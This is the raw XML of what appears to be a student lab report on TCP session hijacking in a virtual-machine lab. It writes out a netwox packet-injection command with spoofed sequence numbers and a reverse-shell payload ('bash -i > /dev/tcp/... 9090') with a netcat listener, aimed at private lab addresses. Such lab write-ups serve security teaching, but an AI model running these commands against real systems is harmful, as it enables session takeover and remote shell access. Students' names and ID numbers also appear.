          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--ip4-dst 10.0.2.5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000097">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--ip4-ttl 64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--tcp-src 56590</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000099">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--tcp-dst 23</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--tcp-seqnum 2222414271</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--tcp-window 229</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--tcp-acknum 1144759723</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--tcp-data 48656c6c6f20576f726c64</w:t>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t xml:space="preserve">Now we can put together our packet.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ sudo netwox 40 --ip4-src 10.0.2.4 --ip4-dst 10.0.2.5 --ip4-ttl 64 --tcp-src 56590 --tcp-dst 23 --tcp-seqnum 2222414271 --tcp-window 229 --tcp-acknum 1144759723 --tcp-ack --tcp-data 48656c6c6f20576f726c64</w:t>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t xml:space="preserve">This the the packet we created and injected into the TCP session:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5557557" cy="3633788"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="17" name="image8.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image8.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5557557" cy="3633788"/>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t xml:space="preserve">After the attack we go to the Client’s machine and check Wireshark:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2844800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="19" name="image17.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image17.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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t xml:space="preserve">We can see that there are many TCP retransmission packets between the Client and the Server. The data the Attacker sent changed the sequence numbers, so the Server believes that the packet is lost and keeps trying to retransmit the packet, but it keeps being dropped by the Client.</w:t>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b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Task 5: Creating Reverse Shell using TCP Session Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AD">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To create the reverse shell, we need to conduct a TCP session hijack on the Victims VM that is telnet into the server (Observer VM in this case).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We attach the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">in/bash -i &gt; /dev/tcp/@.@.@.@/9090 0&lt;&amp;1 2&gt;&amp;1 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to the TCP Packet in the data payload. At the same time we use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">netcat </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">on the Attacker VM to listen to for any potential connections on port 9090 using command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -l 9090 -v</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We first establish the telnet connection between Victim and Observer and then create the TCP packet that will contain the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">in/bash -i &gt; /dev/tcp/10.0.2.12/9090 0&lt;&amp;1 2&gt;&amp;1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3898900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5" name="image16.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image16.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3898900"/>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rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Thus, when the hijacked TCP packet reaches the Victim VM that is telneted into the Server (Observer VM) it will run the command and force a connection to the Attacker VM allowing the Attacker to gain access to the Server (Observer VM).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="635000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6"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59436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rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B9">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The connection is successful when the TCP packet is acknowledged and the command runs successfully. </w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId28" w:type="default"/>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A">
    <w:pPr>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">Brandon Haripersad - 500769285</w:t>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BB">
    <w:pPr>
      <w:rPr>
        <w:highlight w:val="white"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:highlight w:val="white"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">Ahraanei Krishnakumaran - 500830384</w:t>
    </w:r>
  </w:p>
  <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BC">
    <w:pPr>
      <w:rPr>
        <w:highlight w:val="whit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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId23"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9.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId27"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5.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId18"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